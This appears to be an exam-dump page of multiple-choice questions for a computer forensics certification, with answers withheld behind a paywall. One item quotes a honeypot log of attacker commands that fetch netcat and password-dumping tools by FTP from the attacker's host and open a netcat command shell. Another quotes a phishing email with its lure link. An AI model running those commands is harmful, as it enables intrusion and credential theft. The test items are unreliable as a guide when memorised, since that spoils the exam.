March Sale - Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70dumps

312-49v9 Questions and Answers

Question # 6

When analyzing logs, it is important that the clocks of all the network devices are synchronized. Which protocol will help in synchronizing these clocks?

A.

UTC

B.

PTP

C.

Time Protocol

D.

NTP

Full Access
Question # 7

What technique is used by JPEGs for compression?

A.

TIFF-8

B.

ZIP

C.

DCT

D.

TCD

Full Access
Question # 8

What must an attorney do first before you are called to testify as an expert?

A.

Qualify you as an expert witness

B.

Read your curriculum vitae to the jury

C.

Engage in damage control

D.

Prove that the tools you used to conduct your examination are perfect

Full Access
Question # 9

Which Event Correlation approach assumes and predicts what an attacker can do next after the attack by studying statistics and probability?

A.

Profile/Fingerprint-Based Approach

B.

Bayesian Correlation

C.

Time (Clock Time) or Role-Based Approach

D.

Automated Field Correlation

Full Access
Question # 10

Identify the term that refers to individuals who, by virtue of their knowledge and expertise, express an independent opinion on a matter related to a case based on the information that is provided.

A.

Expert Witness

B.

Evidence Examiner

C.

Forensic Examiner

D.

Defense Witness

Full Access
Question # 11

Which of the following is a non-zero data that an application allocates on a hard disk cluster in systems running on Windows OS?

A.

Sparse File

B.

Master File Table

C.

Meta Block Group

D.

Slack Space

Full Access
Question # 12

Amelia has got an email from a well-reputed company stating in the subject line that she has won a prize money, whereas the email body says that she has to pay a certain amount for being eligible for the contest. Which of the following acts does the email breach?

A.

CAN-SPAM Act

B.

HIPAA

C.

GLBA

D.

SOX

Full Access
Question # 13

When reviewing web logs, you see an entry for resource not found in the HTTP status code field.

What is the actual error code that you would see in the log for resource not found?

A.

202

B.

404

C.

606

D.

999

Full Access
Question # 14

What type of analysis helps to identify the time and sequence of events in an investigation?

A.

Time-based

B.

Functional

C.

Relational

D.

Temporal

Full Access
Question # 15

John is working on his company policies and guidelines. The section he is currently working on covers company documents; how they should be handled, stored, and eventually destroyed. John is concerned about the process whereby outdated documents are destroyed. What type of shredder should John write in the guidelines to be used when destroying documents?

A.

Strip-cut shredder

B.

Cross-cut shredder

C.

Cross-hatch shredder

D.

Cris-cross shredder

Full Access
Question # 16

What technique is used by JPEGs for compression?

A.

ZIP

B.

TCD

C.

DCT

D.

TIFF-8

Full Access
Question # 17

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

A.

Security Administrator

B.

Network Administrator

C.

Director of Information Technology

D.

Director of Administration

Full Access
Question # 18

In Windows Security Event Log, what does an event id of 530 imply?

A.

Logon Failure – Unknown user name or bad password

B.

Logon Failure – User not allowed to logon at this computer

C.

Logon Failure – Account logon time restriction violation

D.

Logon Failure – Account currently disabled

Full Access
Question # 19

Which of the following tool enables a user to reset his/her lost admin password in a Windows system?

A.

Advanced Office Password Recovery

B.

Active@ Password Changer

C.

Smartkey Password Recovery Bundle Standard

D.

Passware Kit Forensic

Full Access
Question # 20

Which response organization tracks hoaxes as well as viruses?

A.

NIPC

B.

FEDCIRC

C.

CERT

D.

CIAC

Full Access
Question # 21

Lance wants to place a honeypot on his network. Which of the following would be your recommendations?

A.

Use a system that has a dynamic addressing on the network

B.

Use a system that is not directly interacting with the router

C.

Use it on a system in an external DMZ in front of the firewall

D.

It doesn't matter as all replies are faked

Full Access
Question # 22

The objective of this act was to protect consumers’ personal financial information held by financial institutions and their service providers.

A.

Gramm-Leach-Bliley Act

B.

Sarbanes-Oxley 2002

C.

California SB 1386

D.

HIPAA

Full Access
Question # 23

What binary coding is used most often for e-mail purposes?

A.

MIME

B.

Uuencode

C.

IMAP

D.

SMTP

Full Access
Question # 24

The efforts to obtain information before a trail by demanding documents, depositions, questioned and answers written under oath, written requests for admissions of fact and examination of the scene is a description of what legal term?

A.

Detection

B.

Hearsay

C.

Spoliation

D.

Discovery

Full Access
Question # 25

You have been called in to help with an investigation of an alleged network intrusion. After questioning the members of the company IT department, you search through the server log files to find any trace of the intrusion. After that you decide to telnet into one of the company routers to see if there is any evidence to be found. While connected to the router, you see some unusual activity and believe that the attackers are currently connected to that router. You start up an ethereal session to begin capturing traffic on the router that could be used in the investigation. At what layer of the OSI model are you monitoring while watching traffic to and from the router?

A.

Network

B.

Transport

C.

Data Link

D.

Session

Full Access
Question # 26

Harold is a computer forensics investigator working for a consulting firm out of Atlanta Georgia. Harold is called upon to help with a corporate espionage case in Miami Florida. Harold assists in the investigation by pulling all the data from the computers allegedly used in the illegal activities. He finds that two suspects in the company where stealing sensitive corporate information and selling it to competing companies. From the email and instant messenger logs recovered, Harold has discovered that the two employees notified the buyers by writing symbols on the back of specific stop signs. This way, the buyers knew when and where to meet with the alleged suspects to buy the stolen material. What type of steganography did these two suspects use?

A.

Text semagram

B.

Visual semagram

C.

Grill cipher

D.

Visual cipher

Full Access
Question # 27

Which program is the bootloader when Windows XP starts up?

A.

KERNEL.EXE

B.

NTLDR

C.

LOADER

D.

LILO

Full Access
Question # 28

Which of the following commands shows you all of the network services running on Windows-based servers?

A.

Netstart

B.

Net Session

C.

Net use

D.

Net config

Full Access
Question # 29

Linux operating system has two types of typical bootloaders namely LILO (Linux Loader) and GRUB (Grand Unified Bootloader). In which stage of the booting process do the bootloaders become active?

A.

Bootloader Stage

B.

Kernel Stage

C.

BootROM Stage

D.

BIOS Stage

Full Access
Question # 30

Steve, a forensic investigator, was asked to investigate an email incident in his organization. The organization has Microsoft Exchange Server deployed for email communications. Which among the following files will Steve check to analyze message headers, message text, and standard attachments?

A.

PUB.EDB

B.

PRIV.EDB

C.

PUB.STM

D.

PRIV.STM

Full Access
Question # 31

A state department site was recently attacked and all the servers had their disks erased. The incident response team sealed the area and commenced investigation. During evidence collection they came across a zip disks that did not have the standard labeling on it. The incident team ran the disk on an isolated system and found that the system disk was accidentally erased. They decided to call in the FBI for further investigation. Meanwhile, they short listed possible suspects including three summer interns. Where did the incident team go wrong?

A.

They examined the actual evidence on an unrelated system

B.

They attempted to implicate personnel without proof

C.

They tampered with evidence by using it

D.

They called in the FBI without correlating with the fingerprint data

Full Access
Question # 32

The police believe that Melvin Matthew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating systems manufacturers, cellular telephone manufacturers, Internet Service Providers and Educational Institutions. They also suspect that he has been stealing, copying and misappropriating proprietary computer software belonging to the several victim companies. What is preventing the police from breaking down the suspects door and searching his home and seizing all of his computer equipment if they have not yet obtained a warrant?

A.

The Fourth Amendment

B.

The USA patriot Act

C.

The Good Samaritan Laws

D.

The Federal Rules of Evidence

Full Access
Question # 33

You are assisting in the investigation of a possible Web Server Hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a porno graphic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site?

A.

ARP Poisoning

B.

DNS Poisoning

C.

HTTP redirect attack

D.

IP Spoofing

Full Access
Question # 34

Jack Smith is a forensics investigator who works for Mason Computer Investigation Services. He is investigating a computer that was infected by Ramen Virus.

He runs the netstat command on the machine to see its current connections. In the following screenshot, what do the 0.0.0.0 IP addresses signify?

 

A.

Those connections are established

B.

Those connections are in listening mode

C.

Those connections are in closed/waiting mode

D.

Those connections are in timed out/waiting mode

Full Access
Question # 35

The use of warning banners helps a company avoid litigation by overcoming an employee assumed __________________________. When connecting to the company's intranet, network or Virtual Private Network(VPN) and will allow the company's investigators to monitor, search and retrieve information stored within the network.

A.

Right to work

B.

Right of free speech

C.

Right to Internet Access

D.

Right of Privacy

Full Access
Question # 36

When cataloging digital evidence, the primary goal is to

A.

Make bit-stream images of all hard drives

B.

Preserve evidence integrity

C.

Not remove the evidence from the scene

D.

Not allow the computer to be turned off

Full Access
Question # 37

When obtaining a warrant, it is important to:

A.

particularlydescribe the place to be searched and particularly describe the items to be seized

B.

generallydescribe the place to be searched and particularly describe the items to be seized

C.

generallydescribe the place to be searched and generally describe the items to be seized

D.

particularlydescribe the place to be searched and generally describe the items to be seized

Full Access
Question # 38

You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company's network. How would you answer?

A.

Microsoft Methodology

B.

Google Methodology

C.

IBM Methodology

D.

LPT Methodology

Full Access
Question # 39

Which file is a sequence of bytes organized into blocks understandable by the system’s linker?

A.

executable file

B.

source file

C.

Object file

D.

None of these

Full Access
Question # 40

When marking evidence that has been collected with the “aaa/ddmmyy/nnnn/zz” format, what does the “nnnn” denote?

A.

The initials of the forensics analyst

B.

The sequence number for the parts of the same exhibit

C.

The year he evidence was taken

D.

The sequential number of the exhibits seized by the analyst

Full Access
Question # 41

An expert witness is a __________________ who is normally appointed by a party to assist the formulation and preparation of a party’s claim or defense.

A.

Expert in criminal investigation

B.

Subject matter specialist

C.

Witness present at the crime scene

D.

Expert law graduate appointed by attorney

Full Access
Question # 42

Smith, as a part his forensic investigation assignment, seized a mobile device. He was asked to recover the Subscriber Identity Module (SIM card) data in the mobile device. Smith found that the SIM was protected by a Personal Identification Number (PIN) code, but he was also aware that people generally leave the PIN numbers to the defaults or use easily guessable numbers such as 1234. He made three unsuccessful attempts, which blocked the SIM card. What can Jason do in this scenario to reset the PIN and access SIM data?

A.

He should contact the network operator for a Temporary Unlock Code (TUK)

B.

Use system and hardware tools to gain access

C.

He can attempt PIN guesses after 24 hours

D.

He should contact the network operator for Personal Unlock Number (PUK)

Full Access
Question # 43

The process of restarting a computer that is already turned on through the operating system is called?

A.

Warm boot

B.

Ice boot

C.

Hot Boot

D.

Cold boot

Full Access
Question # 44

When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts _______________ in the first letter position of the filename in the FAT database.

A.

A Capital X

B.

A Blank Space

C.

The Underscore Symbol

D.

The lowercase Greek Letter Sigma (s)

Full Access
Question # 45

After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, stateful firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?

A.

Stateful firewalls do not work with packet filtering firewalls

B.

NAT does not work with stateful firewalls

C.

IPSEC does not work with packet filtering firewalls

D.

NAT does not work with IPSEC

Full Access
Question # 46

Software firewalls work at which layer of the OSI model?

A.

Application

B.

Network

C.

Transport

D.

Data Link

Full Access
Question # 47

Windows identifies which application to open a file with by examining which of the following?

A.

The File extension

B.

The file attributes

C.

The file Signature at the end of the file

D.

The file signature at the beginning of the file

Full Access
Question # 48

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system - johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Full Access
Question # 49

You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls? (Choose two.)

A.

162

B.

161

C.

163

D.

160

Full Access
Question # 50

What information do you need to recover when searching a victim’s computer for a crime committed with specific e-mail message?

A.

Internet service provider information

B.

E-mail header

C.

Username and password

D.

Firewall log

Full Access
Question # 51

Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual media. He shuts the system down by pulling the power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to disconnecting any. What do you think would be the next sequence of events?

A.

Connect the target media; prepare the system for acquisition; Secure the evidence; Copy the media

B.

Prepare the system for acquisition; Connect the target media; copy the media; Secure the evidence

C.

Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media

D.

Secure the evidence; prepare the system for acquisition; Connect the target media; copy the media

Full Access
Question # 52

In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?

A.

one who has NTFS 4 or 5 partitions

B.

one who uses dynamic swap file capability

C.

one who uses hard disk writes on IRQ 13 and 21

D.

one who has lots of allocation units per block or cluster

Full Access
Question # 53

As a part of the investigation, Caroline, a forensic expert, was assigned the task to examine the transaction logs pertaining to a database named Transfers. She used SQL Server Management Studio to collect the active transaction log files of the database. Caroline wants to extract detailed information on the logs, including AllocUnitId, page id, slot id, etc. Which of the following commands does she need to execute in order to extract the desired information?

A.

DBCC LOG(Transfers, 1)

B.

DBCC LOG(Transfers, 3)

C.

DBCC LOG(Transfers, 0)

D.

DBCC LOG(Transfers, 2)

Full Access
Question # 54

What does the command “C:\>wevtutil gl ” display?

A.

Configuration information of a specific Event Log

B.

Event logs are saved in .xml format

C.

Event log record structure

D.

List of available Event Logs

Full Access
Question # 55

Examination of a computer by a technically unauthorized person will almost always result in:

A.

Rendering any evidence found inadmissible in a court of law

B.

Completely accurate results of the examination

C.

The chain of custody being fully maintained

D.

Rendering any evidence found admissible in a court of law

Full Access
Question # 56

Pick the statement which does not belong to the Rule 804. Hearsay Exceptions; Declarant Unavailable.

A.

Statement of personal or family history

B.

Prior statement by witness

C.

Statement against interest

D.

Statement under belief of impending death

Full Access
Question # 57

Self-Monitoring, Analysis, and Reporting Technology (SMART) is built into the hard drives to monitor and report system activity. Which of the following is included in the report generated by SMART?

A.

Power Off time

B.

Logs of high temperatures the drive has reached

C.

All the states (running and discontinued) associated with the OS

D.

List of running processes

Full Access
Question # 58

Adam, a forensic investigator, is investigating an attack on Microsoft Exchange Server of a large organization. As the first step of the investigation, he examined the PRIV.EDB file and found the source from where the mail originated and the name of the file that disappeared upon execution. Now, he wants to examine the MIME stream content. Which of the following files is he going to examine?

A.

PRIV.STM

B.

gwcheck.db

C.

PRIV.EDB

D.

PUB.EDB

Full Access
Question # 59

To reach a bank web site, the traffic from workstations must pass through a firewall. You have been asked to review the firewall configuration to ensure that workstations in network 10.10.10.0/24 can only reach the bank web site 10.20.20.1 using https. Which of the following firewall rules meets this requirement?

A.

if (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 443) then permit

B.

if (source matches 10.10.10.0/24 and destination matches 10.20.20.1 and port matches 80 or 443) then permit

C.

if (source matches 10.10.10.0 and destination matches 10.20.20.1 and port matches 443) then permit

Full Access
Question # 60

What document does the screenshot represent?

A.

Expert witness form

B.

Search warrant form

C.

Chain of custody form

D.

Evidence collection form

Full Access
Question # 61

Which of the following components within the android architecture stack take care of displaying windows owned by different applications?

A.

Media Framework

B.

Surface Manager

C.

Resource Manager

D.

Application Framework

Full Access
Question # 62

What does the Rule 101 of Federal Rules of Evidence states?

A.

Scope of the Rules, where they can be applied

B.

Purpose of the Rules

C.

Limited Admissibility of the Evidence

D.

Rulings on Evidence

Full Access
Question # 63

Which rule requires an original recording to be provided to prove the content of a recording?

A.

1004

B.

1002

C.

1003

D.

1005

Full Access
Question # 64

What is the first step taken in an investigation for laboratory forensic staff members?

A.

Packaging the electronic evidence

B.

Securing and evaluating the electronic crime scene

C.

Conducting preliminary interviews

D.

Transporting the electronic evidence

Full Access
Question # 65

Which US law does the interstate or international transportation and receiving of child pornography fall under?

A.

§18. U.S.C. 1466A

B.

§18. U.S.C 252

C.

§18. U.S.C 146A

D.

§18. U.S.C 2252

Full Access
Question # 66

Which of the following tool can the investigator use to analyze the network to detect Trojan activities?

A.

Regshot

B.

TRIPWIRE

C.

RAM Computer

D.

Capsa

Full Access
Question # 67

Which of the following techniques can be used to beat steganography?

A.

Encryption

B.

Steganalysis

C.

Decryption

D.

Cryptanalysis

Full Access
Question # 68

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?

A.

Poison the DNS records with false records

B.

Enumerate MX and A records from DNS

C.

Establish a remote connection to the Domain Controller

D.

Enumerate domain user accounts and built-in groups

Full Access
Question # 69

Why is it a good idea to perform a penetration test from the inside?

A.

It is never a good idea to perform a penetration test from the inside

B.

Because 70% of attacks are from inside the organization

C.

To attack a network from a hacker's perspective

D.

It is easier to hack from the inside

Full Access
Question # 70

A(n) _____________________ is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence.

A.

blackout attack

B.

automated attack

C.

distributed attack

D.

central processing attack

Full Access
Question # 71

Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM files on a computer. Where should Harold navigate on the computer to find the file?

A.

%systemroot%\system32\LSA

B.

%systemroot%\system32\drivers\etc

C.

%systemroot%\repair

D.

%systemroot%\LSA

Full Access
Question # 72

If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?

A.

The zombie will not send a response

B.

31402

C.

31399

D.

31401

Full Access
Question # 73

A packet is sent to a router that does not have the packet destination address in its route table.

How will the packet get to its proper destination?

A.

Root Internet servers

B.

Border Gateway Protocol

C.

Gateway of last resort

D.

Reverse DNS

Full Access
Question # 74

Why should you note all cable connections for a computer you want to seize as evidence?

A.

to know what outside connections existed

B.

in case other devices were connected

C.

to know what peripheral devices exist

D.

to know what hardware existed

Full Access
Question # 75

You are working as a Computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows the subject of your investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact law enforcement and provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and monitor all traffic to the subject’s computer. You inform the officer that you will not be able to comply with that request because doing so would:

A.

Violate your contract

B.

Cause network congestion

C.

Make you an agent of law enforcement

D.

Write information to the subject’s hard drive

Full Access
Question # 76

Microsoft Outlook maintains email messages in a proprietary format in what type of file?

A.

.email

B.

.mail

C.

.pst

D.

.doc

Full Access
Question # 77

Which of the following data structures stores attributes of a process, as well as pointers to other attributes and data structures?

A.

Lsproc

B.

DumpChk

C.

RegEdit

D.

EProcess

Full Access
Question # 78

Under confession, an accused criminal admitted to encrypting child pornography pictures and then hiding them within other pictures. What technique did the accused criminal employ?

A.

Typography

B.

Steganalysis

C.

Picture encoding

D.

Steganography

Full Access
Question # 79

Which forensic investigation methodology believes that criminals commit crimes solely to benefit their criminal enterprises?

A.

Scientific Working Group on Digital Evidence

B.

Daubert Standard

C.

Enterprise Theory of Investigation

D.

Fyre Standard

Full Access
Question # 80

After attending a CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in establishing a null session with one of the servers. Why is that?

A.

RestrictAnonymous must be set to "10" for complete security

B.

RestrictAnonymous must be set to "3" for complete security

C.

RestrictAnonymous must be set to "2" for complete security

D.

There is no way to always prevent an anonymous null session from establishing

Full Access
Question # 81

Which of the following Registry components include offsets to other cells as well as the LastWrite time for the key?

A.

Value list cell

B.

Value cell

C.

Key cell

D.

Security descriptor cell

Full Access
Question # 82

Before performing a logical or physical search of a drive in Encase, what must be added to the program?

A.

File signatures

B.

Keywords

C.

Hash sets

D.

Bookmarks

Full Access
Question # 83

Smith is an IT technician that has been appointed to his company's network vulnerability assessment team. He is the only IT employee on the team. The other team members include employees from

Accounting, Management, Shipping, and Marketing. Smith and the team members are having their first meeting to discuss how they will proceed. What is the first step they should do to create the network

vulnerability assessment plan?

A.

Their first step is to make a hypothesis of what their final findings will be.

B.

Their first step is to create an initial Executive report to show the management team.

C.

Their first step is to analyze the data they have currently gathered from the company or interviews.

D.

Their first step is the acquisition of required documents, reviewing of security policies and compliance.

Full Access
Question # 84

Data Files contain Multiple Data Pages, which are further divided into Page Header, Data Rows, and Offset Table. Which of the following is true for Data Rows?

A.

Data Rows store the actual data

B.

Data Rows present Page type. Page ID, and so on

C.

Data Rows point to the location of actual data

D.

Data Rows spreads data across multiple databases

Full Access
Question # 85

Lynne receives the following email:

Dear lynne@gmail.com! We are sorry to inform you that your ID has been temporarily frozen due to incorrect or missing information saved at 2016/11/10 20:40:24

You have 24 hours to fix this problem or risk to be closed permanently!

To proceed Please Connect >> My Apple ID

Thank You The link to My Apple ID shows http://byggarbetsplatsen.se/backup/signon/

What type of attack is this?

A.

Mail Bombing

B.

Phishing

C.

Email Spamming

D.

Email Spoofing

Full Access
Question # 86

Which of the following examinations refers to the process of providing the opposing side in a trial the opportunity to question a witness?

A.

Cross Examination

B.

Direct Examination

C.

Indirect Examination

D.

Witness Examination

Full Access
Question # 87

What is the framework used for application development for iOS-based mobile devices?

A.

Cocoa Touch

B.

Dalvik

C.

Zygote

D.

AirPlay

Full Access
Question # 88

Which command can provide the investigators with details of all the loaded modules on a Linux-based system?

A.

list modules -a

B.

lsmod

C.

plist mod -a

D.

lsof -m

Full Access